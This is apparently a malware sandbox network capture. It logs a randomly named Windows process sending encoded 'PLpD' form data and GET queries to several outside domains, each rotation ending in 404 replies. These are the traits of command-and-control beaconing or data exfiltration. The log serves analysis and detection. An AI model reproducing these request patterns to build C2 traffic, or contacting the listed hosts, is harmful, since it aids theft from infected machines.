                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                ETag: W/"66cd104a-b96"
                                                                                Content-Encoding: gzip


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                27 | 192.168.2.5 | 50008 | 161.97.168.245 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:52.883647919 CET | 1821 | OUT | POST /qrcg/ HTTP/1.1
                                                                                Host: www.nb-shenshi.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.nb-shenshi.buzz
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.nb-shenshi.buzz/qrcg/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:15:54.185619116 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:53 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                ETag: W/"66cd104a-b96"
                                                                                Content-Encoding: gzip


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                28 | 192.168.2.5 | 50009 | 161.97.168.245 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:15:55.552510023 CET | 523 | OUT | GET /qrcg/?PLpD=1fKHCnrcuLb+woCu5SHdUNHs45cyPNHAmKr2RbCfVfhm3PNz+rp77RggAVXwPiu1rMLErXVWwt2AmyUPU1kZHbinTcvoliy7Dmh5Jg4zqF2ez6vORVKEMmKyq03H3aWHiQ==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.nb-shenshi.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:15:56.847404003 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:56 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 2966
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                ETag: "66cd104a-b96"
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                Dec 3, 2024 14:15:56.861588955 CET | 1236 | IN
                                                                                Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                Dec 3, 2024 14:15:56.861603975 CET | 448 | IN
                                                                                Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                                                Dec 3, 2024 14:15:56.861613989 CET | 250 | IN
                                                                                Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                29 | 192.168.2.5 | 50010 | 103.75.185.22 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:02.930191994 CET | 796 | OUT | POST /ydza/ HTTP/1.1
                                                                                Host: www.taxitayninh365.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.taxitayninh365.site
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.taxitayninh365.site/ydza/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=VSrsQJ1QnpkqrZdfhBUw5ysZ/uvuSy7okzip6/FiarGR1D3AU/DHeRx1NxO6EU/nT3qA2NrFrqAjBZjJt6VRMvo9ptlvBtIkCBw2SZbAc23x+8TXXEnXHYX0ekVtOdcAQSMvXEbxU0Z346iR0UcMgp0W+5kEzDeKlaCWVrCyXrQm3v+aYJZSBD9VG4JhCh2kwiS4/EM=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                30 | 192.168.2.5 | 50011 | 103.75.185.22 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:05.598521948 CET | 816 | OUT | POST /ydza/ HTTP/1.1
                                                                                Host: www.taxitayninh365.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.taxitayninh365.site
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.taxitayninh365.site/ydza/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=VSrsQJ1QnpkqkZNfkmAwoSsazOvuYS6jkzup67VIZZyR0jHAV63HZRx1DRO/Zk/uT3mi2MXFrqUjBbrJsJ9OO/oz89ltMNIkCBw2SZP+c2vx+JDXXn/UEYXrZkVtF9c+QSNIXFWWU2x346SR0FcLpp0Q65l6+gbOoJepJqvaOYYO2ZPwCrR6SjRtWrBWTRXNqBCIhTYRutkk+CNRgQmIccGX1AV4


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                31 | 192.168.2.5 | 50012 | 103.75.185.22 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:08.260205984 CET | 1833 | OUT | POST /ydza/ HTTP/1.1
                                                                                Host: www.taxitayninh365.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.taxitayninh365.site
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.taxitayninh365.site/ydza/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=VSrsQJ1QnpkqkZNfkmAwoSsazOvuYS6jkzup67VIZZKR0Q/AUZfHYRx1dBO+Zk+sTzCm2MawrukjA+nJr8BOH/oz+9lsBtIxCBgySZf+c2vx+O7XAknUI4X0ekUiOdcFQUlyXFThUHR34aCR5X0Lx50S95ly+nTBoJDYJqaxOYgO0sW/ZfJjHSNsYZlJGkPRlTOepwkSydJH5khPky7SGZKi1ws7YF1w+PJvWVldgCgWNWi8eZO/GxrDtdtJq7Nw/We1Hta7jEyKHWpHYZx5WMorthIm43mZiOIfpxYNu9HLgdDr1C/GEZYc6ecQLPx3x9GrlAOqyUSlSq9B9Ljps2FGcTdGnJKJ0slzm08xH0fftGvxy40iphrPTkreeKRSrzQxo6nwDpPsQz+FzJcR03lDXOHhRjTSt526cGwNtVSDaorKCbmQw6y+3ejnB+036DPEcrRGN4cNAIKWB4fkX2g3KMraTaguny/7Fo/lq0AS68XUbUOOB/QwMJZ6/mzps3h9oH+gvthI+yFtoAAgec8P+P2se6I9644z0MuJ/B8CnbGPOvI1HCOTUVTkpP9oKm2Zy0xE5IBw5ZvX3R8x2Lsjs2ZPcsYtTZKt/pCdlh7LZhJLAGz+z+aY5LESa2g+tV6BrXtMVUtpM3ekOS41iqyDEAoyyJCAOYBNH0Frb2kxkhqbMX2T27L/gG4/lAojWQVGcepMtzXwIAv+2G+okDFDhLhV/pGy7M0HKL4xIzK8gao6alF9maLuc2JM+ltHE6BVdagxQpAkmscidljrHuo9mTgq7W/1tols2DP5pFakScoBhsgw7oLVwo+TLtZgz3JS2mxnmf/0BxjsCNFapzSjEZHd/RwRmWArK+NKzdlkF+e0AnKpEg8XxWyJa8SpZBpWkGtSnEWXXnnl83nsnp9z02cWRycMXcc4tdP6t3QGpaKtaammO4wW8uiKdv63R/TQ4FnKihVb1aGQSkehePaW9ZjdPpTH2viT7rfBrMPPFWH [TRUNCATED]
                                                                                Dec 3, 2024 14:16:09.858510971 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 1238
                                                                                date: Tue, 03 Dec 2024 13:16:09 GMT
                                                                                server: LiteSpeed
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                                                Dec 3, 2024 14:16:09.858531952 CET | 240 | IN
                                                                                Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                32 | 192.168.2.5 | 50013 | 103.75.185.22 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:11.032444954 CET | 527 | OUT | GET /ydza/?PLpD=YQDMT/cjjLIrhYhTk0Qcn1c+4/vXTHer2WGK9Y1kX6vo8j7CWoL4SlIzIlGkR2TnTHSV+ODB3q8FGPL6osY1BIA0voRLPdIJFDITNJjOTEnO/NX/dE7RBJTjciFlPthnKg==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.taxitayninh365.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:16:12.663497925 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 1238
                                                                                date: Tue, 03 Dec 2024 13:16:12 GMT
                                                                                server: LiteSpeed
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                                                Dec 3, 2024 14:16:12.663518906 CET | 240 | IN
                                                                                Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                33 | 192.168.2.5 | 50014 | 155.94.253.4 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:18.358870029 CET | 793 | OUT | POST /fsgl/ HTTP/1.1
                                                                                Host: www.rtpmesinkoin.click
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.rtpmesinkoin.click
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.rtpmesinkoin.click/fsgl/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=P/4MES7+smWo2+CGQAN61iZVrgYaIx9YODtKcq3W8KrFQSYl8JYxc7ldSrEFJVh2u2FNy4AdxvpAajPt37snrHKSLBa3gb0qqQHg8avQ+dSX9jqWKJUORSLnhapf66TH8SDQzL4tCtnEcKFvBWI17M3z+IlzphZIlp7HUCe2RbzS6ydbTMI1ZmY6m6xGTAzJuG9zcEQ=
                                                                                Dec 3, 2024 14:16:19.609900951 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 796
                                                                                date: Tue, 03 Dec 2024 13:16:19 GMT
                                                                                server: LiteSpeed
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                34 | 192.168.2.5 | 50015 | 155.94.253.4 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:21.024667025 CET | 813 | OUT | POST /fsgl/ HTTP/1.1
                                                                                Host: www.rtpmesinkoin.click
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.rtpmesinkoin.click
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.rtpmesinkoin.click/fsgl/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Ascii: PLpD=P/4MES7+smWo2fyGDTl6zCYnugYaSB9cODxKcoHG//DFQ3kl9Mkxf7ldZLFuD1h9u2Iyy4sdxvtAajft3LQkpXKQGha1u70qqQHg8eHu+daX8TaWJs0JYyLor6pftKTc8SDizPhKCvfEcK1vBEw0sc316IkwsR8igbP4SEXzOYn22ksxJuAdKG0C2p5xCwSg0ltDCTFp+j7RqY4D2iZBqD+NWPMZ
                                                                                Dec 3, 2024 14:16:22.265120983 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 796
                                                                                date: Tue, 03 Dec 2024 13:16:22 GMT
                                                                                server: LiteSpeed
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                35 | 192.168.2.5 | 50016 | 155.94.253.4 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:23.693845987 CET | 1830 | OUT | POST /fsgl/ HTTP/1.1
                                                                                Host: www.rtpmesinkoin.click
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.rtpmesinkoin.click
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.rtpmesinkoin.click/fsgl/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:16:24.990312099 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 796
                                                                                date: Tue, 03 Dec 2024 13:16:24 GMT
                                                                                server: LiteSpeed
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                36 | 192.168.2.5 | 50017 | 155.94.253.4 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:26.344985008 CET | 526 | OUT | GET /fsgl/?PLpD=C9QsHkK47GSD7r6TBBJA1A1gthYOFQJYbFs9cpfO+uKQdjQ23Lhhb84Ia8cTOlIJgW821ZMigtRpVm/E2N9FpRWGdFmoqY0sqDryt//frta9xBWKUdk1ZjTnobcgzZTMuw==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.rtpmesinkoin.click
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:16:27.647408009 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 796
                                                                                date: Tue, 03 Dec 2024 13:16:27 GMT
                                                                                server: LiteSpeed
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                37 | 192.168.2.5 | 50018 | 208.91.197.27 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:33.368778944 CET | 802 | OUT | POST /cbfz/ HTTP/1.1
                                                                                Host: www.cortisalincontrol.net
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.cortisalincontrol.net
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.cortisalincontrol.net/cbfz/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                38 | 192.168.2.5 | 50019 | 208.91.197.27 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:36.103821993 CET | 822 | OUT | POST /cbfz/ HTTP/1.1
                                                                                Host: www.cortisalincontrol.net
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.cortisalincontrol.net
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.cortisalincontrol.net/cbfz/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                39 | 192.168.2.5 | 50020 | 208.91.197.27 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:38.802494049 CET | 1839 | OUT | POST /cbfz/ HTTP/1.1
                                                                                Host: www.cortisalincontrol.net
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.cortisalincontrol.net
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.cortisalincontrol.net/cbfz/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                40 | 192.168.2.5 | 50021 | 208.91.197.27 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:41.483920097 CET | 529 | OUT | GET /cbfz/?PLpD=wkx2NXiTkimKkWVEm8IW4C4huKMmJZN5WgEr82Da3v6V9hQpjwkjAwPIlceTp9yKNyaCzMrAs840f3u2xWNXdTvTMZn4meFjRqcHxGrlREZ38HV0x/J+b0VjoEphiZZaRg==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.cortisalincontrol.net
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
